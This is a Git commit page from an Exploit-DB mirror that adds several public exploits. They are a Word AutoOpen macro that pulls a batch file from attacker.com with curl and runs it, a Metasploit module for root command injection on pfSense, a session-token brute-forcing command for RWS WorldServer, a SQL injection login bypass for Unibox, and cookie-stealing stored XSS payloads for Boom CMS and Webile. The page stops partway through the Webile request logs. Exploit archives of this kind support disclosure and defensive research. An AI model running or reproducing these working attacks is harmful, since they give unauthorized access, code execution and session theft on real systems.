bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-07-21

Browse source 
10 changes to exploits/shellcodes/ghdb

Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.

RWS WorldServer 11.7.3 - Session Token Enumeration

Aures Booking & POS Terminal - Local Privilege Escalation

Boom CMS v8.0.7 - Cross Site Scripting

PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

pfSense v2.7.0 - OS Command Injection

Webile v1.0.1 - Multiple Cross Site Scripting

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
This commit is contained in:
Exploit-DB 2023-07-21 00:16:29 +00:00
parent 3a3c03321c
commit 98cdb05106
10 changed files with 1530 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

43
exploits/multiple/remote/51609.txt Normal file
View file

@ -0,0 +1,43 @@
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
## Time spend:
00:35:00

176
exploits/multiple/webapps/51619.txt Normal file
View file

@ -0,0 +1,176 @@
Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
Session tokens in RWS WorldServer have a low entropy and can be
enumerated, leading to unauthorised access to user sessions.
Details
=======
Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357
Introduction
============
"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."
(from the vendor's homepage)
More Details
============
WorldServer associates user sessions with numerical tokens, which always
are positive values below 2^31. The SOAP action "loginWithToken" allows
for a high amount of parallel attempts to check if a token is valid.
During analysis, many assigned tokens were found to be in the 7-digit
range of values. An attacker is therefore able to enumerate user
accounts in only a few hours.
Proof of Concept
================
In the following an example "loginWithToken" request is shown:
-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org">
<soapenv:Header/>
<soapenv:Body>
<com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<token xsi:type="xsd:string">FUZZ</token>
</com:loginWithToken>
</soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------
It can be saved as file "login-soap.req" and be used as a request
template for the command-line HTTP enumerator monsoon [1] to achieve
many parallel requests:
-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'
Target URL: https://www.example.com/
status header body value extract
500 191 560 5829099
500 191 556 6229259
200 191 3702 7545136
500 191 556 9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------
The --range parameter reflects the possible value range of 2^31 and for
each value an HTTP request is sent to the WorldServer SOAP API where the
FUZZ marker in the request template is replaced with the respective
value. Also responses are hidden which contain "InvalidSessionException"
as these sessions are invalid. Responses will yield a status code of 200
if an administrative session token is found. For an unprivileged user
session, status code 500 is returned.
Workaround
==========
Lower the rate at which requests can be issued, for example with a
frontend proxy.
Fix
===
According to the vendor, upgrading to versions above 11.8.0 resolves the
vulnerability.
Security Risk
=============
Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to get access to multiple user accounts, including
administrative accounts using this method in under three hours.
Additionally, by using such an administrative account it seems likely to
be possible to execute arbitrary code on the underlying server by
customising the REST API [2]. Thus, the vulnerability poses a high risk.
Timeline
========
2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released
References
==========
[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

244
exploits/php/webapps/51608.rb Executable file
View file

@ -0,0 +1,244 @@
# Exploit Title: pfSense v2.7.0 - OS Command Injection
#Exploit Author: Emir Polat
# CVE-ID : CVE-2023-27253
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'pfSense Restore RRD Data Command Injection',
'Description' => %q{
This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of
pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore"
privilege to execute arbitrary operating system commands as the "root" user.
This module has been tested successfully on version 2.6.0-RELEASE.
},
'License' => MSF_LICENSE,
'Author' => [
'Emir Polat', # vulnerability discovery & metasploit module
],
'References' => [
['CVE', '2023-27253'],
['URL', 'https://redmine.pfsense.org/issues/13935'],
['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
],
'DisclosureDate' => '2023-03-18',
'Platform' => ['unix'],
'Arch' => [ ARCH_CMD ],
'Privileged' => true,
'Targets' => [
[ 'Automatic Target', {}]
],
'Payload' => {
'BadChars' => "\x2F\x27",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat'
}
},
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)
register_options [
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
]
end
def check
unless login
return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'GET',
'keep_cookies' => true
)
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
unless res&.body&.include?('Diagnostics: ')
return Exploit::CheckCode::Safe('Vulnerable module not reachable')
end
version = detect_version
unless version
return Exploit::CheckCode::Detected('Unable to get the pfSense version')
end
unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
end
Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
end
def login
# Skip the login process if we are already logged in.
return true if @logged_in
csrf = get_csrf('index.php', 'GET')
unless csrf
print_error('Could not get the expected CSRF token for index.php when attempting login!')
return false
end
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' => {
'__csrf_magic' => csrf,
'usernamefld' => datastore['USERNAME'],
'passwordfld' => datastore['PASSWORD'],
'login' => ''
},
'keep_cookies' => true
)
if res && res.code == 302
@logged_in = true
true
else
false
end
end
def detect_version
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'keep_cookies' => true
)
# If the response isn't a 200 ok response or is an empty response, just return nil.
unless res && res.code == 200 && res.body
return nil
end
if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
nil
else
version
end
end
def get_csrf(uri, methods)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, uri),
'method' => methods,
'keep_cookies' => true
)
unless res && res.body
return nil # If no response was returned or an empty response was returned, then return nil.
end
# Try regex match the response body and save the match into a variable named csrf.
if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
return nil # No match could be found, so the variable csrf won't be defined.
else
return csrf
end
end
def drop_config
csrf = get_csrf('diag_backup.php', 'GET')
unless csrf
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
end
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'keep_cookies' => true
)
if res && res.code == 200 && res.body =~ /<rrddatafile>/
return res.body
else
return nil
end
end
def exploit
unless login
fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
end
csrf = get_csrf('diag_backup.php', 'GET')
unless csrf
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
end
config_data = drop_config
if config_data.nil?
fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
end
if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
end
config_data.gsub!(' ', '${IFS}')
send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'keep_cookies' => true
)
if res
print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
end
end
end

111
exploits/php/webapps/51610.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635
The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.
## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------
POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private
<!DOCTYPE html>
<html lang="en">
html content
</html>

206
exploits/php/webapps/51612.txt Normal file
View file

@ -0,0 +1,206 @@
# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting
References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274
Release Date: 2023-07-03
Vulnerability Laboratory ID (VL-ID): 2274
Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life
easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.
It gives editors control but doesn't require any technical knowledge.
(Copy of the Homepage:https://www.boomcms.net/boom-boom )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.
Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the input fields of the album title and album description in the asset-manager module.
Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.
After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.
The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse
the content by usage of a backslash. Thus does not have any impact to inject own malicious
java-scripts because of its only performed for double- and single-quotes to prevent sql injections.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] assets-manager (album)
Vulnerable Function(s):
[+] add
Vulnerable Parameter(s):
[+] title
[+] description
Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!
Payload(s):
><script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>
--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"
:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Vulnerable Source: asset-manager/albums/[ID]
<li data-album="36">
<a href="#albums/20">
<div>
<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
<p class='count'><span>0</span> assets</p>
</div>
</a>
</li>
</iframe></p></div></a></li></ul></div></div>
</div>
<div id="b-assets-view-asset-container"></div>
<div id="b-assets-view-selection-container"></div>
<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
<div class="heading">
<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
</div>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.
Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

240
exploits/php/webapps/51616.txt Normal file
View file

@ -0,0 +1,240 @@
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321
Release Date:
=============
2023-07-03
Vulnerability Laboratory ID (VL-ID):
====================================
2321
Common Vulnerability Scoring System:
====================================
5.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in
the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,
statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other
functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,
Windows, Linux, iOS, Android and other multi-platform operating systems.
(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.
Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious
script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Parameter(s):
[+] new_file_name
[+] i
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"
title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
</div></div></div>
history logs messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
</thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
</td>
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>
--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie:
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
--- PoC Session Logs #2 (POST) --- (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
